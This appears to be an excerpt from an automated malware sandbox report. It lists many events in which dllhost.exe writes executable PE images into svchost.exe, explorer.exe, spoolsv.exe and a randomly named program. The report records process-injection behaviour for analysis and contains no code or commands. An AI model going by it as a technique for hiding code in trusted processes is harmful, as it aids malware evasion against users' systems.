Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108B940000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166930000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 8BA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 151C5AA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 270F8FD0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 16BF33D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 1A348770000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2FB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1F3EAD60000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 18686DD0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 24F4DB10000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27E6F950000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2DC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: A50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F30000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: ED0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13E0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F30000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E20000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 15B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2B60000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1350000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1310000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1270000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: AA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2F40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1150000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: ED0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C20000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: A40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1380000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 900000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 14C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: D00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9F0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13F0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: D00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 510000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 6E0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9E0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E30000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 870000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B90000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1A0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F10000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1390000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1470000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 5C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 910000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 5B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EE0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: BD0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 3B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F40000 value starts with: 4D5A Jump to behavior
